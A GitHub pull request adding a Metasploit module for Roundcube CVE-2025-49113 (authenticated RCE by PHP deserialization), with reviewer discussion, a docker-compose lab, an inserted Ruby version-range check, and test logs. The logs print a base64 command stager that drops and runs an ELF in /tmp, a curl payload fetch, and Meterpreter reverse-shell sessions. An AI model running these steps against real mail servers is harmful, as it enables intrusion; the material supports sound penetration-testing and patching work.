Add Remote for Roundсube CVE-2025-49113 post-authentication RCE module #20291


Merged: 20 commits, Jun 11, 2025

Conversation

@vognik (Contributor) commented Jun 7, 2025

Vulnerability Details

This module exploits a post-authentication remote code execution vulnerability via a file upload endpoint. The vulnerability stems from improper validation of the uploaded filename, which is deserialized on the server side without sufficient sanitization. By embedding a PHP serialization gadget chain in the filename, an authenticated attacker can achieve remote code execution.

This issue is tracked as CVE-2025-49113. Exploitation results in code execution as the web server user.

Module Information

Module path: exploit/multi/http/roundcube_auth_rce_cve_2025_49113
Platform: Linux/Windows
Tested on: Kali Linux
Requirements: Authentication

References

Original PoC - Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization

Test Output

msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > show options

Module options (exploit/multi/http/roundcube_unauth_rce_cve_2025_49113):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      9999             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of the Roundcube Application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    yes       Email User to login with
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux

msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > exploit

[*] Started reverse TCP handler on 192.168.159.129:8082 
[*] Using URL: http://192.168.159.129:9696/
[*] Fetching CSRF token...
[*] Attempting login...
[+] Login successful.
[*] Uploading malicious payload...
[*] Client 192.168.181.148 (curl/7.74.0) requested /
[*] Sending payload to 192.168.181.148 (curl/7.74.0)
[*] Sending stage (3045380 bytes) to 192.168.181.148
[*] Meterpreter session 1 opened (192.168.159.129:8082 -> 192.168.181.148:56528) at 2025-06-06 21:05:59 -0400
[+] Exploit attempt complete. Check for session.
[*] Server stopped.

meterpreter > getuid
Server username: www-data

meterpreter > sysinfo
Computer     : dante.local
OS           : Debian 11.5 (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

@vognik vognik changed the title Add Remote for Roundсube CVE-2025-49113 unauthenticated RCE module Add Remote for Roundсube CVE-2025-49113 post-authentication RCE module Jun 7, 2025
@jvoisin (Contributor) left a comment

CC @firsov

@firsov commented Jun 7, 2025

It should be something like this:
if version below 10510 or version.between?(10600, 10610)
because all versions below 1.5.10 are affected.
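As an added example (not code from the PR's module), a Ruby check that converts a Roundcube version string into the numeric form the module extracts (1.5.9 becomes 10509) and applies the affected-range rule from the comment above; the fixed-release strings it reports are derived from that rule and are assumptions, not values taken from this page.

```ruby
# Added example, not part of the PR's module: encode a Roundcube version
# string as major*10000 + minor*100 + patch (e.g. "1.5.9" -> 10509) and
# apply the affected-range rule from the review comment: vulnerable when
# below 1.5.10 (10510) or between 1.6.0 (10600) and 1.6.10 (10610) inclusive.

# Returns the numeric version, or nil when the string is not a version.
def roundcube_version_number(version)
  m = version.to_s.strip.match(/\A(\d+)\.(\d+)(?:\.(\d+))?\z/)
  return nil unless m
  major, minor, patch = m[1].to_i, m[2].to_i, (m[3] || 0).to_i
  major * 10_000 + minor * 100 + patch
end

# True when the numeric version falls inside an affected range.
def vulnerable_to_cve_2025_49113?(version_number)
  return false if version_number.nil?
  version_number < 10510 || version_number.between?(10600, 10610)
end

# Assumption: the first non-affected release of each branch, derived from
# the range rule above (1.5.10 for the 1.5 branch, 1.6.11 for the 1.6 branch).
def fixed_release_for(version_number)
  version_number < 10600 ? '1.5.10' : '1.6.11'
end

# Human-readable assessment for a version string as reported by the target.
def assess(version)
  num = roundcube_version_number(version)
  return "#{version}: unrecognised version string" if num.nil?
  if vulnerable_to_cve_2025_49113?(num)
    "#{version} (#{num}): affected, upgrade to #{fixed_release_for(num)} or later"
  else
    "#{version} (#{num}): not in an affected range"
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs, including the 1.5.9 image used in the PR.
  %w[1.5.9 1.5.10 1.6.10 1.6.11 1.4.13 banana].each { |v| puts assess(v) }
end
```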

@vognik (Contributor, Author) commented Jun 7, 2025

@firsov that's true, thanks!

@jvoisin fixed everything.
I left only the image uploading in the old way, because otherwise the server returns an error about the image size (as I wrote above).

@msutovsky-r7 msutovsky-r7 self-assigned this Jun 9, 2025
@msutovsky-r7 (Contributor) left a comment

Hi @vognik, thank you for your contribution! I had trouble making your module run. It seems like the payload is sent but never triggered. I'll check this out later, but in the meantime, would you mind providing steps to set up the target as you tested it?

@vognik (Contributor, Author) commented Jun 9, 2025

@msutovsky-r7 thanks for the feedback!

I committed the changes and specified in the documentation the docker-compose file I used:

version: '3'
services:
  db:
    image: mariadb:10.5
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: example_root_pass
      MYSQL_DATABASE: roundcube
      MYSQL_USER: roundcube_user
      MYSQL_PASSWORD: roundcube_pass
    volumes:
      - db_data:/var/lib/mysql
  roundcube:
    image: roundcube/roundcubemail:1.5.9-apache
    depends_on:
      - db
    ports:
      - "8080:80"
    environment:
      ROUNDCUBEMAIL_DEFAULT_HOST: <ROUNDCUBEMAIL_DEFAULT_HOST>
      ROUNDCUBEMAIL_SMTP_SERVER: <ROUNDCUBEMAIL_SMTP_SERVER>
      ROUNDCUBEMAIL_SMTP_PORT: 587
      ROUNDCUBEMAIL_SMTP_USER: <ROUNDCUBEMAIL_SMTP_USER>
      ROUNDCUBEMAIL_SMTP_PASS: <ROUNDCUBEMAIL_SMTP_PASS>
      ROUNDCUBEMAIL_DES_KEY: randomstring
      ROUNDCUBEMAIL_DB_TYPE: mysql
      ROUNDCUBEMAIL_DB_HOST: db
      ROUNDCUBEMAIL_DB_USER: roundcube_user
      ROUNDCUBEMAIL_DB_PASSWORD: roundcube_pass
      ROUNDCUBEMAIL_DB_NAME: roundcube
volumes:
  db_data:

Co-authored-by: Valentin Lobstein <[email protected]>
@msutovsky-r7 (Contributor) left a comment

msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > run verbose=true 
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 172.20.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Extracted version: 10509
[+] The target appears to be vulnerable.
[*] Fetching CSRF token...
[+] Extracted token: NorYS2SUl9hvp5yTB5zieYbIWrtVMLOT
[*] Attempting login...
[+] Login successful.
[*] Preparing payload...
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwUAAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/IQhuv.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/GAawB' < '/tmp/IQhuv.b64' ; chmod +x '/tmp/GAawB' ; '/tmp/GAawB' ; rm -f '/tmp/GAawB' ; rm -f '/tmp/IQhuv.b64'"]
[+] Payload successfully generated and serialized.
[*] Uploading malicious payload...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.20.0.3
[*] Meterpreter session 1 opened (172.20.0.1:4444 -> 172.20.0.3:40862) at 2025-06-10 12:02:33 +0200
[+] Exploit attempt complete. Check for session.

@msutovsky-r7 (Contributor) left a comment

Thanks @vognik, great module!

msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > run verbose=true 
[*] Started reverse TCP handler on 172.19.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Extracted version: 10509
[+] The target appears to be vulnerable.
[*] Fetching CSRF token...
[+] Extracted token: aHSkYDWrIULj8XDuw60qWwfNbbRYkCaL
[*] Attempting login...
[+] Login successful.
[*] Preparing payload...
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwTAAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/EGVbO.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/UUsED' < '/tmp/EGVbO.b64' ; chmod +x '/tmp/UUsED' ; '/tmp/UUsED' ; rm -f '/tmp/UUsED' ; rm -f '/tmp/EGVbO.b64'"]
[+] Payload successfully generated and serialized.
[*] Uploading malicious payload...
[+] Exploit attempt complete. Check for session.
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.19.0.3
[*] Meterpreter session 5 opened (172.19.0.1:4444 -> 172.19.0.3:60118) at 2025-06-11 10:31:37 +0200

meterpreter > sysinfo
Computer     : 172.19.0.3
OS           : Debian 11.5 (Linux 6.12.10-76061203-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

@msutovsky-r7 msutovsky-r7 merged commit f2920f8 into rapid7:master Jun 11, 2025
18 checks passed
@msutovsky-r7 msutovsky-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 11, 2025
@msutovsky-r7 (Contributor)

Release Notes

This adds a module for CVE-2025-49113, remote code execution by PHP object deserialization. The module requires user credentials for successful exploitation.
